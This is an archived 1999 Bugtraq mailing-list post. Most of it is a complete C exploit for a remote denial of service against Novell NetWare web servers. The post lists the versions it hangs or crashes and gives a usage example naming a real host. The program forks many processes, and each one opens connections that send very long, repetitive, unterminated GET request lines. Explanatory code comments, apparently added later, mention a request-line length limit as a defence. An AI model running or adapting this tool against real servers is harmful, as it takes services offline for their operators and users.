[10831] in bugtraq


Novell NetWare webservers DoS

daemon@ATHENA.MIT.EDU (Przemyslaw Frasunek)
Wed Jun 16 14:38:47 1999

Mime-Version: 1.0
Content-Type: text/plain; charset=US-ASCII
Content-Transfer-Encoding: 7bit
Message-Id: <19990616155836.9888.qmail@venglin.gadaczka.dhs.org>
Date: 	Wed, 16 Jun 1999 17:58:36 +0200
Reply-To: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
From: Przemyslaw Frasunek <venglin@LAGOON.FREEBSD.ORG.PL>
To: BUGTRAQ@NETSPACE.ORG

Sorry if this has already been published:

/******************************************************************************
              Novell NetWare webservers remote denial of service
                       <venglin@lagoon.freebsd.org.pl>
*******************************************************************************
 Tested on:

  - Novell NetWare 4.11 with Novell-HTTP-Server/3.1R1:
    Webserver stops responding to requests for a few minutes.

  - Novell NetWare 4.1 with Novell-HTTP-Server/2.51R1:
    Whole system crash [page fault?].

  - Novell NetWare ?.? with YAWN/1.05 (crc:E8B0):
    Webserver crash.

  - Novell NetWare 3.12 with YAWN/1.05 (crc:E8B0):
    No problems.

  - Novell NetWare 4.11 with YAWN/1.05 (crc:E8B0):
    No problems.

*******************************************************************************
 Usage:

  ./www <vulnerable_host> <http_port> <how_many_connections> <string_length>

 Example:

  ./www copernicus.9lo.lublin.pl 80 10 10000
******************************************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#include <netdb.h>
#include <sys/wait.h>

/* Request method token that starts every message main() builds. */
#define GET "GET"
/*
 * Path fragments.  main() starts every message with PAT1 and then pads each
 * of its four messages by repeating one of PAT1..PAT4.  main() sizes its
 * buffers and loop counts with sizeof on these literals, which counts the
 * terminating NUL as well as the visible characters.
 */
#define PAT1 "/"
#define PAT2 "a/"
#define PAT3 "../"
#define PAT4 "./"

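/*
 * Resolve `name` to an IPv4 address in network byte order.
 *
 * `name` is first parsed as a dotted-quad literal; if that fails it is looked
 * up with gethostbyname().  The process exits with status 1 when the name
 * cannot be resolved or the answer is not a 4-byte IPv4 address.
 *
 * Returns the 32-bit address widened to long, suitable for storing in
 * sockaddr_in.sin_addr.s_addr.
 */
long getip(char *name)
{
  struct hostent *hp;
  in_addr_t addr;

  /*
   * Keep the result in the 32-bit type inet_addr() returns and compare it
   * with INADDR_NONE.  Once inet_addr() is properly declared, storing the
   * result in a 64-bit long and testing it against -1 never matches, so the
   * hostname lookup below would be skipped.  The literal 255.255.255.255
   * has the same value as INADDR_NONE and also falls through to the lookup.
   */
  addr = inet_addr(name);
  if (addr == INADDR_NONE)
  {
    hp = gethostbyname(name);
    if (hp == NULL)
    {
      /* gethostbyname() reports failures through h_errno, so the errno
         text printed by perror() may not describe the real cause. */
      perror("gethostbyname");
      exit(1);
    }
    /* Copy only when the answer really is a 4-byte IPv4 address, instead
       of assuming the length as a hard-coded 4. */
    if (hp->h_addrtype != AF_INET || hp->h_length != (int)sizeof(addr) ||
        hp->h_addr_list[0] == NULL)
    {
      fprintf(stderr, "gethostbyname: no IPv4 address\n");
      exit(1);
    }
    memcpy(&addr, hp->h_addr_list[0], sizeof(addr));
  }
  return (long)addr;
}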

/*
 * Entry point.  Builds four oversized "GET /<fragment repeated>" strings and
 * has each forked child send them, one per TCP connection, to the host and
 * port given on the command line.
 *
 *   argv[1]  host name or dotted-quad address (resolved by getip())
 *   argv[2]  TCP port
 *   argv[3]  number of child processes to fork
 *   argv[4]  approximate length of the repeated path portion
 *
 * What reaches the server per child is four connections, each carrying a
 * single write of "GET /" followed by up to argv[4] bytes of one repeated
 * fragment ("/", "a/", "../" or "./").  No HTTP version, header or line
 * terminator is appended, so on the wire this shows up as an unusually long,
 * highly repetitive, unterminated request line; a request-line length limit
 * in front of the server is the natural place to reject it.
 *
 * Written with old-style (K&R) parameter declarations.
 */
int main (argc, argv)
int argc;
char **argv;
{
  struct sockaddr_in cli;
  int sockfd, i, x, len;
  char *msg1, *msg2, *msg3, *msg4;

  /* A usage error exits with status 0, so a caller cannot tell it apart
     from a normal run. */
  if (argc < 5) { (void)fprintf(stderr, "usage: %s <host> <port> <connections> <len>\n", argv[0]); exit(0); }

  /* Destination: IPv4, address from getip(), port parsed with atoi()
     (argv[2] is not validated). */
  bzero(&cli, sizeof(cli));
  cli.sin_family = AF_INET;
  cli.sin_addr.s_addr=getip(argv[1]);
  cli.sin_port = htons(atoi(argv[2]));

  /* NOTE(review): len is int but the right-hand side is size_t, so len is
     converted to unsigned for the comparison; a negative argv[4] passes
     this check and flows into the malloc() sizes below. */
  len = atoi(argv[4]);
  if (len < (sizeof(GET)+1+sizeof(PAT1))) { (void)fprintf(stderr, "len too small.\n"); exit(1); }
  /* Each buffer is len + 7 bytes (sizeof counts the NUL of GET and PAT1).
     The malloc() results are used without a NULL check. */
  msg1 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
  msg2 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
  msg3 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);
  msg4 = (char *) malloc(len+sizeof(GET)+sizeof(PAT1)+1);

  /* Every message starts as "GET /". */
  sprintf(msg1, "%s %s", GET, PAT1);
  sprintf(msg2, "%s %s", GET, PAT1);
  sprintf(msg3, "%s %s", GET, PAT1);
  sprintf(msg4, "%s %s", GET, PAT1);

  /* Append each fragment len / sizeof(PATn) times.  sizeof includes the
     NUL, so every loop adds fewer than len visible bytes; that is the only
     thing keeping the unbounded strcat() calls inside the buffers above. */
  for(i=0;i<(len/sizeof(PAT1));i++) strcat(msg1, PAT1);
  for(i=0;i<(len/sizeof(PAT2));i++) strcat(msg2, PAT2);
  for(i=0;i<(len/sizeof(PAT3));i++) strcat(msg3, PAT3);
  for(i=0;i<(len/sizeof(PAT4));i++) strcat(msg4, PAT4);

  /* One child per iteration; argv[3] is re-parsed on every pass.  Only the
     child (fork() == 0) enters the block.  A failed fork() (-1) is not
     reported: the parent simply moves on to the next iteration. */
  for(i=0;i<(atoi(argv[3]));i++) if (!(x=fork()))
  {
  /* Connection 1 of 4: send msg1 ("/" repeated) in one write() and close.
     The write() result is ignored and nothing is read back. */
  if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    perror("socket");
    exit(1);
  }
  if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
  {
    perror("connect");
    exit(1);
  }
  write(sockfd, msg1, strlen(msg1));
  close(sockfd);

  /* Connection 2 of 4: same sequence with msg2 ("a/" repeated). */
  if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    perror("socket");
    exit(1);
  }
  if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
  {
    perror("connect");
    exit(1);
  }
  write(sockfd, msg2, strlen(msg2));
  close(sockfd);

  /* Connection 3 of 4: same sequence with msg3 ("../" repeated). */
  if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    perror("socket");
    exit(1);
  }
  if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
  {
    perror("connect");
    exit(1);
  }
  write(sockfd, msg3, strlen(msg3));
  close(sockfd);

  /* Connection 4 of 4: same sequence with msg4 ("./" repeated). */
  if((sockfd = socket(AF_INET, SOCK_STREAM, 0)) < 0)
  {
    perror("socket");
    exit(1);
  }
  if(connect(sockfd, (struct sockaddr *)&cli, sizeof(cli)) < 0)
  {
    perror("connect");
    exit(1);
  }
  write(sockfd, msg4, strlen(msg4));
  close(sockfd);

  /* The child ends here and never returns to the fork loop. */
  exit(0);
  }

  /* Waits only for the pid left in x by the last fork(); earlier children
     are not reaped here, and x is uninitialized if the loop body never ran.
     i is reused as the status word. */
  waitpid(x,&i,0);

  exit(0);
}

--
* Fido: 2:480/124 ** WWW: lagoon.freebsd.org.pl/~venglin ** GSM:48-601-383657 *
* Inet: venglin@lagoon.freebsd.org.pl ** PGP:D48684904685DF43EA93AFA13BE170BF *
